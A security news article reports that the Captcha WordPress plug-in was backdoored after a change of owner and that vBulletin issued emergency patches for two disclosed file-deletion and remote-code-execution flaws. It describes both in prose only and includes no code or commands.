Yet Another WordPress Extension Changes Owner and Gets Backdoored

A WordPress plug-in called Captcha with more than 300,000 active installations contained a backdoor that allowed its maintainer to gain unauthorized administrative access to other people’s websites.

The plug-in was apparently backdoored after its previous developer sold it to unspecified new owners in September. This is not the first time a popular piece of software has been used maliciously after a change in ownership and highlights a larger problem with the software supply chain.

The Captcha plug-in was removed from the official WordPress repository recently and its new owners, an outfit called Simplywordpress, claimed that the reason was a trademark issue, with WordPress asking them to change their name.

Researchers from Web security firm Wordfence didn’t buy that explanation and decided to investigate the plug-in to see if the removal wasn’t actually because of a security issue. Sure enough, their suspicion proved correct when they found that a backdoor had been added to the plug-in code.

Specifically, the latest plug-in version contained an automatic update process that downloaded a ZIP file from a third-party URL and extracted it over the Captcha plug-in installed on the site. WordPress plug-ins normally get updates through the official WordPress repository, so the presence of code that downloads a new plug-in version from a third-party URL was suspicious in itself.

It turned out the rogue version in the ZIP archive included a file called plugin-update.php that, when executed, generated an administrative session, set authentication cookies and then deleted itself. Furthermore, the new code implemented an update process that, when triggered, downloaded a clean copy of the plug-in and replaced the rogue one, deleting all traces of the backdoor.

“The backdoor installation code is unauthenticated, meaning anyone can trigger it,” the Wordfence researchers said in a blog post, adding that they will release a proof-of-concept and more details after 30 days to give users time to remove the plug-in from their websites.

This is not the first time when malicious or spam code is added to a popular WordPress plug-in after being bought by a new owner. It seems to be a relatively common technique that allows infecting a large number of websites with a one-time investment.

A similar thing happened with browser extensions, and conceivably could happen with any popular third-party SDKs, libraries and other components that developers incorporate into their applications. Not being able to trust that a new version of a component is clean raises a serious problem, because such lack of trust also could discourage developers from keeping up with critical security fixes in those third-party libraries.

VBulletin Patches Zero-Day Remote Code Execution Flaw

Developers of vBulletin, a proprietary internet forum platform used on tens of thousands of websites, issued emergency patches to fix two serious vulnerabilities that were publicly disclosed last week.

VBulletin Solutions, the company that develops the software, advised users Tuesday to upgrade to vBulletin 5.3.4 Patch Level 1, vBulletin 5.3.3 Patch Level 1 or vBulletin 5.3.2 Patch Level 2 as soon as possible.

The two vulnerabilities were disclosed last week through Beyond Security’s SecuriTeam Secure Disclosure program after repeated attempts to contact vBulletin since November reportedly failed. One of the flaws could allow unauthenticated attackers to delete arbitrary files from a vBulletin installation, while the other could allow attackers to execute arbitrary code on Windows-based web servers.

VBulletin is used by more than 100,000 websites, including many operated by well-known companies and organizations such as Zynga, Electronic Arts, Sony Pictures, NASA and Valve Corporation. Attackers have exploited vBulletin vulnerabilities in the past to compromise very large community forums, including Ubuntuforums.org.

Since these two new vulnerabilities were disclosed last week and vBulletin only released patches for them Tuesday, they had zero-day status for several days and might have already been used in attacks. If you’re a vBulletin user make sure to check your web server logs and file system for signs of compromise.

Lucian Constantin

Lucian Constantin

Lucian has been covering computer security and the hacker culture for almost a decade, his work appearing in many technology publications including PCWorld, Computerworld, Network World, CIO, CSO, Forbes and The Inquirer. He has a bachelor's degree in political science, but has been passionate about computers and cybersecurity from an early age. Before he chose a career in journalism, Lucian worked as a system and network administrator. He enjoys attending security conferences and delving into interesting research papers. You can reach him at [email protected] or @lconstantin on Twitter. For encrypted email, his PGP key's fingerprint is: 7A66 4901 5CDA 844E 8C6D 04D5 2BB4 6332 FC52 6D42

lucian-constantin has 298 posts and counting.See all posts by lucian-constantin